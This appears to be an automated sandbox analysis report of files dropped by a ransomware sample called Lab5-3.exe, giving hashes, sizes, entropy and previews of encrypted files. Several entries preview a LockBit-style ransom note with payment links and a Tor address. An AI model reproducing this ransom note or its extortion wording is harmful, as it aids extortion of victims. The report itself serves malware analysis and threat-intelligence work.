                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5120
                                                                                                          Entropy (8bit):7.965450787624515
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Otnr1bDKm1QHXydTTECezi/8VJXRr0D0lQfQywu546jcbzfVGFQ4X2Gx0uKeY2E+:y5v1yeXECeG/8fXeAlQYGcbzfkyaV0Cb
                                                                                                          MD5:96412781F920887E9B8B90EC6F2CDBC9
                                                                                                          SHA1:109909D76961E01E61D9D8B5366AB8564D156CE3
                                                                                                          SHA-256:0E41C15E9674B21F68201B3C6D3DE9D6A62DE1996AA21291F48D75EF66E6B584
                                                                                                          SHA-512:8951F4C9546CB16A885C935ACDC46332DD5AAF23C52263E397D642DC283965D0A21638E20E7537096B6FDFE2D2A9C47767DD440D5A09103E53D93BE1BF307B18
                                                                                                          Malicious:false
                                                                                                          Preview:q...^.<m.i...q..&...2w2..{.8.....[.A.M*....n.h..u.`..a.'...SJm.....*S..k.Q~....Z8.....I..7Z.@b..?..9oB..4n..X..[}.(.K...1...._...q..k.X..v.........U..I.9...3.}..ZD...clU2P........X.2`zG.[.B....JZ...:.g.r....AS....K...[6.Mh..K..o(,.......\n?....F.L..V]....*....^....$......."{..d..l...v5w....mz.....d...}.-..p{`.."T.*.i...a.I..O..G.`}.p.."..d.m......K.%.#.#.Y..,....&0.-a.!h$*8......npE....,v....8.R:..&M.6.[}h..R....^sh..WX.*...z.O.(!...Q.].........Q}..T.4~e.uH*...SH\.,.o.if.3. N.,.P..5....!.{..^E.V.A.$....M...O.y.V\.U.2".....R.Th..#Kz|..@..8M.K..<L...!I.....0....a.M!<..Few ..S.h.<.48.pu.X..I.C.1i..?...)...\..%...H.ZP..T./Vb...v.Y...rw....)9..,1...m.D...(....H.ot.<....*...y.D.CE%.9..b&vA.s.*...d...J...3...c.+C...D..G......@.).)x......9.9.,fW...Z.K9W..9.K... .6...../@...c^$!......w..0fj 1...h...e...A..3..,a..[NWL .B..P...4C....#%)...W......K..Bf.v4.M..p.<+.BY.@..eA,I.x#....)...6$#@k....S.#. y..". R..0s.'.Q........l+qm]...'.................S
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5312
                                                                                                          Entropy (8bit):7.970763086147136
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ynJr84a7NodXxnQuq5O4kk3t6aMFrxyYNYGkpGx0uKeY2ElUJ:uF+udXqF5scMrMfu0Cb
                                                                                                          MD5:C5DB5328381E0772D6FD0FE5ECE30A0D
                                                                                                          SHA1:B7711336C12444475890AB11A63DDAAEDC548024
                                                                                                          SHA-256:E3DBFABEFD4E650470C83E78A3D72473FC5301DCE8CD761065687DBDFCFE3E43
                                                                                                          SHA-512:00B557C05D52A10F69F697214F70F0BBCB4A86A5DD4365BF725FEA199C425FD93EE4D0FBA96DADADFC9A7E37DC51DC5C528B22DD02D8D9A606974C75B75C9697
                                                                                                          Malicious:false
                                                                                                          Preview:]c:.U...;.{....3..#.o....8u..X.S.LL.gg!p...^...t..lKC...,0_r.4<...>X.....'..^......-......Gl.P.^"......~l....^X....n..?m>.>?.s.E.\...L5[.Q.....D;X.S.7_X.b....+.Y...4. ..........'C7......T....)....(t......<....i.zj....M&...F......D.g.l{.H.?.<!..|.Cx...s&W..H..~.c.p.v].4...Yp2~.b...Ta06..L.Z#......D.oS .....R.R.....xy|G..;..*..B"tr....(t.......v..........I.....T.).......O...*.^..OGS...U'.F.Z"..u..1....}9...f...E..f......!...s2..A`.2Wn..pe/.@u4..DD..M....A!n../....I.D .....Nh..D.-....,..9R.V.......(.;...L4k...<;?..G..pu.f..E....<..<.....y..H.Od......Qg.....w.B...C....R.&.T.7.{]...5..?...T.*^....A.7.]yUR<..``...o.J......(&......Gg._.Ub2..O...).l.9..m.].lA.g.-)R...#Y..u..H....F...|D..q.V....0.;A....yT..&.d..d.Y.......u&.7Z.P...s.`.Ky..A.a...Oo...2.N.....U....J.R..P'.R1V.Tdr.....v.|g.`ix.....{.".~E&..b....?.6..A..\.6.6.8..q1.....X6....=.G..kb9...;...-.J.+.....}/.s...D.c....6i.@.Z...6.i...)1.R.?."lLn_...k....R..C.....c....~N...U.....]F9(b
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.933624124192931
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:nhmVFMZ+1J1L5HBb+TqsxK991irJHfUTid3hBaUoSGFcmeykEdEElU92i:nsVSw1J1lpfsxOGx0uKeY2ElUJ
                                                                                                          MD5:67DBD51D0FD925F1BDEA61D485031BB5
                                                                                                          SHA1:C25BBD07640AB4E8B74B7B417262568CA59638CC
                                                                                                          SHA-256:09E11F32D6550D5CB31976D5CB2A4BB38803F20E5F2B436B1A0B2DA0EF4F455B
                                                                                                          SHA-512:6252CBFE6BBCA42679CD3F1BBC13FD69C2802D31B5DD779211C4A542AD8D71B3504124F049388B6E766652D8E0512217078E09A7C0FAAC353874ED0EFE2C7B64
                                                                                                          Malicious:false
                                                                                                          Preview:.}p.,...j...P.LK.f.l|C.W....~TM..u..!,....#.........*[..K.XjDU.....q&.7A.....^.........!p.#..@.f6.S....Z.)..v.k.~E@e....*MCW.c...T.v.......b...e.:=C.B..Y....X.ty...r.f...z...I...g..5qXjSS...M.W;..........v.e2Sf^....g..&xn!......I..h.(...8t&..])..y.q..&....0.....O ...E.^..7....U..M...]s.5..D..Qz.$...#W......U([.F. ...3./......Q.._.U.W.g~.g..]*4.n.j..5L..D..(u.q..wV:.Y 7.o.S..[a.@..YoK...F.$..B..b.9......Xr|.<.^............Q:15'...e.|.^....Y.....o.5FD....qB.....c..vC..4P..;w.J....h.ni..o<}p.,m<...yR...3F?U|IU.Z...\I..l.I..n.`,3...Rgl_.}..&{[..?..8"..B.5..M.9.Lf..QF.?.\.I.. ..v......FCNS.......W..%g....o.2VZ..=KJ.v.%.,B%..<..."+.Z~../\...:.xS......Ir..P..2\.?..&....B......d.J..%E..W:QD/.kU...O..0FX.9.7..K...E.....=......#......T....M.[.NH..B..:..|l.._JWN..n......Q3..*..0.e.(..z....v"hg.........!Tq...!.7..V.i. ...<.....$.....Qx..Rn.D.+u.s..L..W.....#...w..g..0ir..~......(....C.T..V4.?...R.n.....^...c-.....wM.VR{II.U....W..e..uLB.c.D...W....#`.0..P~i
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6528
                                                                                                          Entropy (8bit):7.973335529255975
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:b/oZjSmCQVtnIz4/wBTAjw8H/fQxHJjpkJARWscvQfWdGx0uKeY2ElUJ:bARRVyMjrfQxHJjpFam0Cb
                                                                                                          MD5:7436B52D1ACC0F48EC1F45B57E2163E0
                                                                                                          SHA1:56C5AAAD3A26344B627C91AAAEC4CC9288568C51
                                                                                                          SHA-256:DCDA78C91F71D73C1D5A7B827A7154D3648DEE08CD9D7061F4ADC9CA587A166F
                                                                                                          SHA-512:198539B02110A180D3F565451696997C229427B67D1507C096A1F65D9257080278ECE3638EC116537B04B285719FFDD48C36F6FB7943F77E396D4A97185FDA18
                                                                                                          Malicious:false
                                                                                                          Preview:]g.Y.x.yM.+}..2+.d.)...,d|gH......N....}.rv....zGh..i.._.....g`..*.~...C..e.l...e.EHt.1.<.G.H.....|...Wi.p.s5..]..x,...../^..I;.Qx.*.(S.G..i..dk......'..#.gA..s...8...U........5;.Q..*.}w|._{..U2.<........q=M.m....4$...S..=......!..$.o.m.3..o)...m.q.E..S....d.!. .w.....~\....8.4..z6q.rk .....,U.".?.........e....b.._.u{kRu......:N.....IvR/i.\..k...:c..8Gw. ..5].Zo.....|....[...X..wj.h_8...S.b....g7......f|.o..0........(.......@.cC..$R."C.t9...|.....G|qp........qK.\Ij.R4.}&...X.(...[....%.Q.9..If"...6.....J_..3.......c^.ob{....!..H^...W...#R.%.z.....B.Y..F...W..HQ5S......w+=....]%..F..B...i..qd.-.5y.O*.p......>....2$r".%...2.x8a..S.c..-..}..i!0......2...)\#..|.";T)Ml3k.pBbyV...|.a...V=>.f...o).Y3z'.z.l...._..'........!......I.c...#..`z.!...p..7.......*.KA..f...|..5../..Y..y.C..LO..?...p...m.. .....}.?.x...?.P.....`..}}:S........JQ...(-...(..~.S!..j.W..I...O..o......QD.:.....?.zw.._.....1.......r.......||.C.4...l...q.'[..uU~t.C@
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5072
                                                                                                          Entropy (8bit):7.9655056159041315
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Pi+BVYDQhEoJOurdu1XbfP6RdpxCQtLP+jWmVgGx0uKeY2ElUJ:Pig6QW+OuJutfSrvCQhGjWmVT0Cb
                                                                                                          MD5:5D5EDB367366A81DFC6ED134D25A7D2D
                                                                                                          SHA1:04B246AFF2F8C441D1ABB7E39AEDC8B86B577410
                                                                                                          SHA-256:8143DE352D5A8BBF2FFE65FD2C9426723638D61E4397A4FB939A687AF7F7CF02
                                                                                                          SHA-512:C90F3763B64612022F07ECB9495364D4194BB5AA1A0BC0CD8A9C6497351C9911FC7461146AEAFAC3A4319A45D2048DBC6F63046C8D06ACC9124F23D91E5D54C6
                                                                                                          Malicious:false
                                                                                                          Preview:7:Eb.-g...:8...}..mt...=8.....;..............=2..:.P....EfX[...v...h.,.....7!z.4..{..1...P...I.?....N(.L....v.c.#cLs|.....9.J.4.I.....(..m...'.".......MR..9..W.^+.......V8......_#D..$..w..P.....y.e+Ea@s&z1...{.'.$.e..tL.....5g...M.....E6.9%.1.....z....r.0A:....nEr....a.x.8.M....xD1.V......'..9q.NO..$...(..\..W?c@....1.eK..o...d.C...>.xK..3.Q.w...I.."..?|.#8.P......-../..x.Xi.......{...q.W.3OC.3.j...x=.jQ^gCz<e.d...b...x&....G*..Z...`.(.e8......,5.V.*.JpJ!..p.......].H.M8....M....._z.....j.....{0...m...7...$....[=)..6P....~.y..E.dy>....Lj.K....\;..B.....`ez.=....`.S.o...%..s7U....,..!.cs..LV..Y.....Q;.....:.H...8Ox..X_..5..$...4..>.iic..+..s..:@.........2D.tg(.l...T..2.!.....pba.Bs.}..7..E".uBj.p6.....2.....L...s.......F...;o.-/Hl.LL..z~..........i..m{.Y......................wvXx-....q.c...o........o.......w...#.....=..P.:..GA.B......7.....'or.n*.H..>...0.V.M.d?3e.... ..*.!|9...263.2...rvJY...`3.q..a....o`.b.zzp...^....Q*
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5024
                                                                                                          Entropy (8bit):7.961122231076688
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ku8ZEvmDoZqvN4LGx+xnGGzm9kZ1BkJ8yOM6G3LpLgGx0uKeY2ElUJ:keQN47Yf26JFRV0Cb
                                                                                                          MD5:D107E099CEF7C0FF5544C8B8610E6E34
                                                                                                          SHA1:9DC57DCC5F59DCBE965924EDF51A10A6BDF253CB
                                                                                                          SHA-256:8F34353CBD216808CA632CCAE8F3EE4C26727151B4EE48637A860F499FCD4CDB
                                                                                                          SHA-512:7311E5AA2C7985EF312FE5A11B37D49809C60C8E05BB8D4239BD5C34EC3949539B99680B7D096D6D8A90B52047795810AB09617AF9CE8A3BBADC54F4C07A8CDF
                                                                                                          Malicious:false
                                                                                                          Preview:|.J$q;zw...[}....b...|..:...Ho.V.-..h.....K....;3..0(.+.*..d.X..H.t..)....2...Z.\..|o...t.s..../..o....*...0{.-r....B..o.p.....Fs....OT....i.. ..q[...b.....2.+.o...........G.......8.u....%;0@....P....:.GbA\.e...;g~..4.VK....h'.!G.iZ...&3.....U....d..F.3.-..G...a..'..i./.[..........QC..)d.r.....]..d&m.A...1..c...j.....'..KqT|............W.-..)<G...!.r:.'....]...(...]8...x.j...}.<.nR.xi..:2....Bf.<...>....PhEbfS..F..YQ..f::..Em.OTV.Vks..0K.f..'..{...!.5...."kn_ ..>....V.;.$.....3........}....L.....n...:.S..J.u....`.Fs..}(Uj..z){.gdFe.I.c.+.3.T...o.Q..6...oN.N(.?.!;...3b.....Tl.R.c...X....E....so4|....4.|.k5.=..N...!.j...A....c{....tK .....z9.1....m.?.^........O..... r.......=L...pg.g.......Kw........s$..X...l....'.*.|lAb.2^.&.8{g-....s.m..!i...A.....!.Vpe.hE.=.5f.o8.(.^...v..D.....c..Y.M.%.5:...g....g...r@U1}E...yfdA'..O.x....9$Uy.*.........H.+...{...@_..c.X;m....Z..t...V..Z.a8.....7...A.`...|T2x.U..9C.4..2x`....K............r..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2992
                                                                                                          Entropy (8bit):7.940003686516871
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2HA19a8Ty44r/C34XPA6DIBCdvbjiHfUTid3hBaUoSGFcmeykEdEElU92i:28a82pbYNsJjdGx0uKeY2ElUJ
                                                                                                          MD5:EE19B466F2FC2FC5CA72EF9F418EC328
                                                                                                          SHA1:4BBE5777A7574A15AF470089B1079265C606168D
                                                                                                          SHA-256:5CB3341FFF9A80E3BC30ABE7E39A477B38E4225FD89899132B25C0FF26C01F4E
                                                                                                          SHA-512:3EDC2D17A325A0C66BA08C493F3A332DFE8A3A9FD1A44D68949C900E1EF1FC6D7ED2AEAE9092FAEBDABB45EEC18CB062620A5FF51EA46FBE9C62238BDABC2D64
                                                                                                          Malicious:false
                                                                                                          Preview:.b....ceK..x.p..H.s...Z=h.L.'..:.....h..O.@p.>/....(F........8....e..S.i.4.....K(.....@....9..~...>.@..{ ]|N..O)...;....R......J.)..M.lg....\ VZ.b.....?.J..t..2.K..._..D.....L.[Ty8.|./.....=c7.})MyY....<C{P....<....w!..`;q....-.)..h8.(*...X.0.xt..B(M..]..l.x..d6...y.ly.Sc............i.........t.\..3..F..mX_4X....X...}2.....z......*.....3}9..[Y....)@7U}.e...;..W.Xr.?..\k._..py..."..A..2..8.%..`....3.n/x.,V... h.w`...7/../....z.p>.."....NV9G.L....%3S.:_e.....\.......q..B..V..Zi....f.M..~....Z...TI:f....h.On nC...LK{m.q.......r.F5i2vl6\...J".."g....kd....Es......4.5]2.{j...H3.tf-.J.3R.C..`.."....x...j`.4&=.{..O.....o.Ie..8.d6t.e...&YF..A..8.....l.:3B.b...d.q...p.$.}b3.~.g.|.271..&.X[.\..-.(..Z*. ...2..h.]...]y\..l...'.P%......Hk.C.6.{.&+..z..8.j.Gs.....(.h`zD.T......"A.E .=NuGn.M..\R....f.cX....v...a.....m..}c..<........G..M...}.N....v..U0.k.j...6>.. ...&.q.......V.h...DH..?.]Qgk.=7.5..5.@.......O...~.EZ.i.v..D....b....v...5.h..Fty..Gp....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):42432
                                                                                                          Entropy (8bit):7.9953653642887526
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:+L7mnpgcbwSEEzw3XMKLJl0YSk09ZNXyV06LOdHDM5txT35mhBaN/rvC3xmZ:+L7mLwSEEz870YSkgZNC+6LO5gTF35mo
                                                                                                          MD5:01DDE5A65D397B12E6DC76AAD98FA04C
                                                                                                          SHA1:109A117439EFCC1DC6323632F5119615A39EA933
                                                                                                          SHA-256:66646707B159F464942B0F1F4CFFF25332699CD146E9B721A38B1E2C829B18A6
                                                                                                          SHA-512:29FC12928ACBE0A503F76D793A16266B5646EAC206F02C629F81E4E92FF65E2979E46C1A6C126E79CF527420AF75EC20E21B29FEE8773DB5F1861D8A31B77982
                                                                                                          Malicious:true
                                                                                                          Preview:&...6..d.....,>^;.m..9..._.<P\..vCM\..gp.......PJmuI\.4...)[.f....k'E..<......L.P#....i........_\.i.]..S7........ .........._..O//`.F<.,.L..);V.h.L..M..c.!...7.J.c....X.+...-..&_js.U..hj.g...W.@....s........=.........w%.Q.t...-8.:...EW..{.....m....e{..x."...(.)M.....t[....".,.....X.x.A....;..`..\f..@....h....D...>.......C'....m._.....P..3....%U.;.X.W_.... P9.. .........-...k...6.....!/...gn..../..-....E.v...1.m..)%..N.y.H.g.>..G..2_......(.[.s...n..0.....,ly....NZ.7...u.,y(4d..X..._....G..........[wZ...'pRW..}j.($$...`.#.4.....,...z2x\.\......<...L...n.?..ojH.B.......8....=......g|.........._....]..\s.3p.F..y}..cS...Y)qR1.vS.S.......@.(Gj...}......eN..^.....C?.*%.....1HF....".l.....g...*...w...nql?%.F..4'...WL....W=..6....d./.=...$..!k..[..+#..n...b...R..8M..,.%...;...D.|.8..r.o...;..m.Cc`#.Ty..?..gL..,_.0&.......>.O.b.S..V:G..b..b.._......W.e.......W..b..R.m./u...G,G.:...#9..-..G...[tt...6.].i..}]..c...77..7...,..;.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
